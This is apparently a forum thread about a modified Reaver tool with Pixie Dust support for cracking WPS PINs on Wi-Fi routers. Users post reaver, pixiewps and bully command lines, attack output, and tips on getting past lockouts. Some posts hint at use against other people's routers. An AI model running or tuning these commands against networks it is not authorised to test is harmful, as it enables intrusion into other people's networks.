Ah, I think I passed right over that, thanks. I'm moving over to the original pixie dust thread because this doesn't really pertain to Reaver...
Printable View
Already has a new update on github.
Was already using the new pixiewps, the Wiire had upgraded the reaver to work, now I made some adjustments to post a little more automated.
I improved the code too
Already has a new update on github.
Bug fixes
Hey,
i tried to test forked reaver & Pixiewps on supposedly invulnerable "D-Link RTL 8671 EV 2006 27 07 (Realtek)".
1. used reaver -i mon0 - bssid -v -K 1 (didn't used -S, as its a realtek chip)
got all the arguments for pixiewps
Result Found as...
a. No WPS pin found
b. WPS Pin= 12345670 (When used -f argument with pixiewps)
2. Now tried to use WPS Generator
3 pin spurted out. When tried to use to to find passphrase. Reaver never proceeds further.
Which Pin is correct? When i use --pin in reaver. Reaver is just stucks in loops and then gets locked out after 10 tries.
https://forums.kali.org/showthread.p...t-Attack/page5
Read the page 5 for pin generator
Thanks for the reply :) Got the logic. Apparently None of the 3 Pins was correct. All tries led to LockOut. PixieWPS also not working on RTL8671. Normal Reaver attack stops @11th pin, and after that "25 Successive Start Failures". Is RTL8671 Un-hackable? ***i am going to lose the bet** :(
The RTL8671 is certainly different. It is a SoC (System on Chip) which means pretty much everything is done on that chip... different than your average AP. SoC are generally found in DSL+Cable+Fiber/Router combo devices which leads me to think that they use a different PRNG.
The good news: When I first noticed the static E-Nonce on Realtek devices it kinda told me that their implementation was insecure. Again, seeing a strange nonce following the XX:XX:00:00 pattern, it leads me to think their implementation here is broken also. Wiire and I are looking at it and if we can't find anything, I'll talk with Dominique Bongard. All great people to work with and I love having the pleasure of being able to :)
--I will move to the Pixie Dust thread since this is does not pertain to Reaver
Hi guys,
First, thank you very much for coming up and posting this great idea.
I'm having a difficulty with Reaver. Basically, it won't return the E-Nonce, PKE, manufacturer, model number, etc. The output is exactly like "regular" Reaver.
I was looking for posts with the same problem, but haven't found... which is also weird... What am I doing wrong? I installed Reaver and Pixie exactly like the instructions, and even re-installed just to be sure.
This is the output I get:
Any ideas?Quote:
> reaver -i wlan1mon -c 6 -b 04:**:**:**:**:** -vv -S
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Switching wlan1mon to channel 6
[+] Waiting for beacon from 04:**:**:**:**:**
[+] Associated with 04:**:**:**:**:** (ESSID: *****)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
^C
[+] Session saved.
Thanks!
On some Technicolor the modified reaver recovers the pin but not the passphrase it freezes on
[+] Running reaver with the correct pin, wait ...
[+] Cmd : reaver -i wlan1mon -b 18:17:25:xx:xx:xx -c 11 -s y -vv -p xxxxxxxx
[Reaver Test] [+] BSSID: 18:17:25:xx:xx:xx
[Reaver Test] [+] Channel: 11
if such thing happens use bully to recover it
example :
bully -b 18:17:25:XX:xx:xx:xx: -c 11 -B -v 2 -p xxxxxxxx
it worked for me
@Vinit2512 the RTL8671 is hackable (tested)
To soxrok2212
Could you clarify the -vv versus -vvv. We downloaded and installed the latest reaver as of 15 June and we get no difference in output regardless of settings. We get all the Pixiedust data sequences in both cases.
Which variable ie -vv or -vvv is supposed to provide all data?
MTeams
hello.
I managed to get 3 pins off 3 different routers but whenever reaver goes into second part of the cracking just hangs at test channel, and I check airodump the router no longer has wps enable/showing like turn off when i got pin.
is there way re-enable? they were on as before I try reaver them.
Ported to Android!
Will update soon with link to build script on my github.
Binaries of pixiewps and t6x-reaver.
http://www.mediafire.com/download/bw...android.tar.gz
having problems with the prereqs
oot@kali:~# apt-get install libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzipReading package lists... Done
Building dependency tree
Reading state information... Done
libssl-dev is already the newest version.
unzip is already the newest version.
unzip set to manually installed.
sqlite3 is already the newest version.
sqlite3 set to manually installed.
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
libpcap-dev : Depends: libpcap0.8-dev but it is not going to be installed
libsqlite3-dev : Depends: libsqlite3-0 (= 3.7.16.2-1~bpo70+1) but 3.8.7.1-1+deb8u1 is to be installed
E: Unable to correct problems, you have held broken packages.
what is force mode?
"Try again with --force or with another (newer) set of data"
and how should I use it?
https://github.com/wiire/pixiewps
Quote:
If the following message is shown:
[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
then the AP might be vulnerable and Pixiewps should be run again with the same set of data along with the option --force or alternatively with a newer set of data.
Is anyone familiar with reaver's "wps transaction failed (0x04)?" WPS is not locked but I get this error constantly.
Thanks for the hard work with updating reaver with pixiewps, but, I get an error that the wps pin was not found and it doesn't continue. I run revare with "reaver -i wlan0mon -b <bssid> -c 11 -K1 -vvv -S" but any combination will produce the same error.
if you use K1 reaver stop after M3 to try pixiewps. If PIN is not fond launch the attack again without K1 to procede with normal WPS brute force
I have problem with the installation of reaver 1.5 because when i put ./CONFIGURE, it give me ERROR: PCAP LIBRARY NOT FOUND. I tried to install update but nothing to do.
This command used to work fine for me, but now every time it just repeatedly says, "Failed to associate.....". Did this stop working for anyone else?
Attacking an RTL8xxx, I am getting lots of "failed to associate"timeout"AP rate limiting - wait 60 seconds" although the pin count rises very slowly. Pixiewps didnt work, are there switches I can use to speed up the process. The 'estimated time' fluctuates between 1 day and 10-14 ?